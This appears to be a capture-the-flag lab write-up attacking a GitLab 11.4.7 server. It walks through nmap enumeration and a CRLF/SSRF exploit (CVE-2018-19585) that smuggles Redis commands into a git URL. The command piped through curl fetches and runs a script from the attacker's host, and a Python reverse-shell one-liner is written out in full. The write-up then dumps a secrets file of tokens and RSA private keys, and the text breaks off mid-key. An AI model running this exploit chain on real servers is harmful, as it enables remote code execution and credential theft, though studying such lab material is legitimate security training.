Skip to main content

Enumeration

Run Nmap Scan

nmap -p- -T4 10.129.227.132

"
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-12 06:08 GMT
Nmap scan report for 10.129.227.132
Host is up (0.013s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
5080/tcp open  onscreen

Nmap done: 1 IP address (1 host up) scanned in 259.63 seconds
"

nmap -p 22,5080 -sC -sV 10.129.227.132

"
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-12 06:13 GMT
Nmap scan report for 10.129.227.132
Host is up (0.041s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.129.227.132:5080/users/sign_in
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.69 seconds
"

View Website

Port 5080 Untitled Click help button (located at the bottom) and Login to check the version of GitLab Untitled Let’s find the vulnerability based on the GitLab Version

Exploitation

Testing CRLF Injection

https://www.youtube.com/watch?v=LrLJuyAdoAg Untitled Untitled 
nc -lvnp 8000

"
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8000
Ncat: Listening on 0.0.0.0:8000
Ncat: Connection from 10.129.63.66.
Ncat: Connection from 10.129.63.66:41954.
004dgit-upload-pack /hello1 
hello2 
hello3 
/test.githost=10.10.14.56:8000
"
Tip: If the response is different from my burp and if you are not getting any netcat response (Git name error), then try removing all the projects inside your project dashboard!

CVE-2018-19585 (CRLF)

Generate Reverse Shell

Online - Reverse Shell Generator 
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.56",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Generate the python3 reverse shell and paste the code into reverse.sh

Listen to Reverse Shell and Exploit

Untitled 
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|curl http://10.10.14.56:8000/reverse.sh | sh\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
/ssrf.git
TLDR; this is a redis command sequence inside a git url that sends a task to background job queues to Redis system and executes malicious tasks GitLab 11.4.7 Remote Code Execution 
nc -lvnp 4444

"
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.63.66.
Ncat: Connection from 10.129.63.66:58360.
git@gitlab:~/gitlab-rails/working$
"

Privilege Escalation

Finding Secrets

ls

"
git@gitlab:/opt/backup$ ls
ls
docker-compose.yml  gitlab-secrets.json  gitlab.rb
"
cat /opt/backup/gitlab-secrets.json 
{
  "gitlab_workhorse": {
    "secret_token": "/HvvEvI/T33qyvK1U4jmnfH7fGxzySlzuhewkOR9Zk0="
  },
  "gitlab_shell": {
    "secret_token": "bad62f769ebf4f96f0114e406fa4605eb25cffd8b629bcff8419bb9078df53b42a219186a19d889a2dfb4f10eb65e6cdc3d784cf70f07c3c29947fc6f1523c14"
  },
  "gitlab_rails": {
    "secret_key_base": "b7c70c02d37e37b14572f5387919b00206d2916098e3c54147f9c762d6bef2788a82643d0c32ab1cdb315753d6a4e59271cddf9b41f37c814dd7d256b7a2f353",
    "db_key_base": "eaa32eb7018961f9b101a330b8a905b771973ece8667634e289a0383c2ecff650bb4e7b1a6034c066af2f37ea3ee103227655c33bc17c123c99f421ee0776429",
    "otp_key_base": "b30e7b1e7e65c31d70385c47bc5bf48cbe774e39492280df7428ce6f66bc53ec494d2fbcbf9b49ec204b3ba741261b43cdaf7a191932f13df1f5bd6018458e56",
    "openid_connect_signing_key": "-----BEGIN RSA PRIVATE KEY-----\n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\n-----END RSA PRIVATE KEY-----\n"
  },
  "gitlab_pages": {
    "admin_secret_token": "3a78ace47a25031e52d79ff2215ac7cb40354c7e1288ba6f4dcc5322a0b0ef52478027761bfa5a922ca261d14756c8c04a0490e16f46e0e937fae93248f53b77"
  },
  "registry": {
    "http_secret": "2723e7222cdf9490fc3204fcebf7e1150252cdf60c5a2dcca875735b656ba09ae44427eeadffcb842e97286fc9b809c0d9357778b790fd077289bf354d36102a",
    "internal_certificate": "-----BEGIN CERTIFICATE-----\nMIIFBTCCAu2gAwIBAgIBADANBgkqhkiG9w0BAQsFADBGMQwwCgYDVQQGEwNVU0Ex\nDzANBgNVBAoMBkdpdExhYjESMBAGA1UECwwJQ29udGFpbmVyMREwDwYDVQQDDAhS\nZWdpc3RyeTAeFw0yMDA3MDgwODUyMjVaFw0zMDA3MDYwODUyMjVaMEYxDDAKBgNV\nBAYTA1VTQTEPMA0GA1UECgwGR2l0TGFiMRIwEAYDVQQLDAlDb250YWluZXIxETAP\nBgNVBAMMCFJlZ2lzdHJ5MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA\n0q30fBVXzLujZnfjunCqoPLpUGEkDs2mSi60lvLwXBjQt3faxRPP+DmwWewC+3+h\n3lMKnl3ZzHF2g0mOUIDnzU9+kuDii+wZEKGO+eta4yVrE6UiwQki/cQPuDHh7e+n\nFQ+EH3L98z/4z+G9/80B6YPj6Nibv1PLS0gHfGbHJqkQxpe8KsCdcuEjzpPgksWw\nf/TNoSGOBspqckGzCrCUbhQNCKoG+yKylfP44bpQtlYUnXoLBGABxUSuHVwHjhpj\nnApxNkOfiUIVeVJzY3ygBUOeyLj1F2NdLgv3+ga5V8+RH1z1U1nh2FVeicQGGAX9\nXsQpGFcvMndfyBslOqGCSKxovj1Fec3DEmu8GviZQJbRE1h0vuJD7c8vHbVtE3hd\nfQyFie2LEnnqOyxNPHLLSK15T6Icz2M5tHkt3RmCabPaXgSrva5I7WLhDdiIfh9P\nHpopQLnLQeXS71Yckruqe1jiTlI+BuIHg/FkZs+gBMpr81oI2MLMy0CG8UlYPLy+\nWmrSHmkulHcYITkkiHXsPSfki2IWEbQUA/Q0x9s/GWQdz0ufv9osxcBVjnHp1c77\nj8kqIE1w7AVZIaACXvF5at9V3y/0wuyx8oxVMaq1kzYyrQCaOd/bsD1DE6lewt5T\n4m9ReMoS/vcJ+dhSDUzZffynOAJQcrd41h78yEkdU3MCAwEAATANBgkqhkiG9w0B\nAQsFAAOCAgEABSPAUNjBTocj453MfYCt1Srbut+FhQQ+YHTBL/ietfUa4xeULJE5\nRPj9rACJYhr32SsCNub574EVSPIzBFUy4Ux+aWgqcHJilL9l5LmPf5kbmPc9H9Mq\nEUEJe+ee2jwj9myf3JILgdmvj+QqXkx5g/hV/Hlls/L9ABeZ+YpY0fu5JRzuYpdV\ncn45+K9NGrgzmPn8nl5hvl24XRbAqjy42pBbVBZeSJsMBJrqUIu90XQv25cpFNsh\nDNQckVu+3CLHPdn3TpPvTnOG+qkYdppckZqLmx9N9/F2wvONAPIX0b96f2ikU9e/\n9+XSv+Pd2qTaz80gq2d7SVwNFz+JDjejNZ6Dx2iSs3wLUdXo/2I+E8dINcj9d4un\n+MhUBYzQr7yyqZIvZRVxl57BCpuFE6/gpdIXVDkV9+dSUlkEfLB4M7U+i6rio78L\nENqkAhX1KsCaibapmqv0FTmOIVjRgacO9ababfZYVGRUY5yWg1bg2t3VruYcpUqN\nzFxP2TGnjGcfEBAJw5p/HKOG23GWHKzJMz8T1HELm/NzmTII4sumhZxNOmak5zUQ\n/SkzXbN4X6+nEjZWXZ1Y5Z07XV+tvVxMlMIkTE9aHIEqQuI/0zWf2R0f3iq078nE\nmUjVumOe5cN0hfhuYa1EhxdqDPvN0zzEiA5NqlD5vbgQ+0KvgdzKBz0=\n-----END CERTIFICATE-----\n",
    "internal_key": "-----BEGIN RSA PRIVATE KEY-----\n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\n-----END RSA PRIVATE KEY-----\n"
  },
  "letsencrypt": {
    "auto_enabled": null
  },
  "mattermost": {
    "email_invite_salt": "8ba431c836b4d9e90a9a699432dd8519",
    "file_public_link_salt": "0d5ad5b9e3135add7e98c8897ef3931c",
    "sql_at_rest_encrypt_key": "e7f6d79dd0dc10882c63eba22a21a416"
  },
  "postgresql": {
    "internal_certificate": "-----BEGIN CERTIFICATE-----\nMIIFBzCCAu+gAwIBAgIBADANBgkqhkiG9w0BAQsFADBHMQwwCgYDVQQGEwNVU0Ex\nDzANBgNVBAoMBkdpdExhYjERMA8GA1UECwwIRGF0YWJhc2UxEzARBgNVBAMMClBv\nc3RncmVTUUwwHhcNMjAwNzA4MDg1MjI2WhcNMzAwNzA2MDg1MjI2WjBHMQwwCgYD\nVQQGEwNVU0ExDzANBgNVBAoMBkdpdExhYjERMA8GA1UECwwIRGF0YWJhc2UxEzAR\nBgNVBAMMClBvc3RncmVTUUwwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC\nAQCzD0w6dY6HwTZn9k9N+4KxKrNuTTIifA34KsiiJn3B6231s4ZxGndGZnQCBnL7\ncG9U11w3z9NNCLuaYaKf09llGEdte9/bV7z/VR/+4Tgnb08kEcYFB2jrbET6wxuH\nliqoMPcgkIe9lU4jXXR6aWCt3c1cu0xoo1lcCtbyHZNxkjO9klTTZOkTwH3GYSzq\nf+4HQ/BC0gN3zhT+GqR0LW341HsAcM75ZhsRt1UZHYCdC0klCKOdSwPX5V6ctCCw\njkr4+8rYvNYGUzjXKG2ff8p7QXeia/luPfl5ihtTj2JglpRQOwc7XnN2DYL7XJnl\nZ6Qi69sjcfR4/tXiVmgRBftd9+o5gjHE6O7DLfjVQhQBBUm962b52g1QEfWRg81C\nqfeOhY7wd3TflLjSZa4RY9B24vAhUmleTKsuvuuxTjbnR26rlds2sOkhNKd9VoUW\nHY2lA7DgMXNl2KpnRF/mtJWBuNGAzGXZ+1W4bgdRmQo6LJaUw3aevWmIOdyXuij/\nBjuhdFeQNT0gkYQy1YEPtmaCKsm7BJ8aSK3XNtPYKyXN+mQWBNTNXFSnaLdFJrlk\nRQ5TnsOOIMX2PIdrfVkZQXMcbTEaAJ9x8OBjXgf50lrM03kHft3GvJWLzmaqJZJJ\nAV33i4lXzMNd+mw8AV6HAxXWkVc4By+ttk7Qjx6aePacewIDAQABMA0GCSqGSIb3\nDQEBCwUAA4ICAQBjldojIyjIssNmYG2z8eDwzXsjlo/Q2G4DYzkqfm13PA0HUh4b\nm7faPn/430qF8vZuCYlREWGzIqV/jvObKoCP0mVd15NgLQoIK04eYrUnWMVvs8YL\nt3Nj77uFP9pRHN12+QRfbz1EkwaGC3AV1fulF6TwfmXRss4c1aurtusOgWTj/eTC\n+GCj5lY3b7RnYBZ6EQ+rPaiaye3yDxHZYOO2HGqGzFxQQvt3XqKycINit8pTA3d5\nNIZTsywBsPL1Pr5+APY4ASfqwSzknzu0G1vQEDq6q4DCx4zPnh50tUs76xPXFz7T\nuTdNUN5L0K58grhnPtinASbfpxFitDS5Y3SVv2oPQjh5K4I6nYp03HNF0as/2+y+\n8y5PKO6DQKBCxaY2u0Ni1RvpWhYVXJroGdSYXYtRg7XYxSwWgRjtzPHEIu/tniSl\nh/6PGWGlMpXYRiOAvOCa2Mzu3PERv9SoM6gCgqWv5GVXRh+3zzQIZaH5ucRzLivF\n8AiIIfnoLmdewiDp9M6jBnzrxFCSSr1P8l6CjEPcWdW6k+WIHipQJ2Dm7v0ixpQh\nKkfhljU6ghZN/oMdj4D+DsxNzBn+OzcAJkfYwigRDJCRTgV9BgB7PuoKTg3lud2c\nGBYzsXR3iThlZMVy2GQHzmW4lYqGhAPGn6ocLSeqMNzcHP6sKwU1oou10g==\n-----END CERTIFICATE-----\n",
    "internal_key": "-----BEGIN RSA PRIVATE KEY-----\n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\nxLE6Xjnus3j1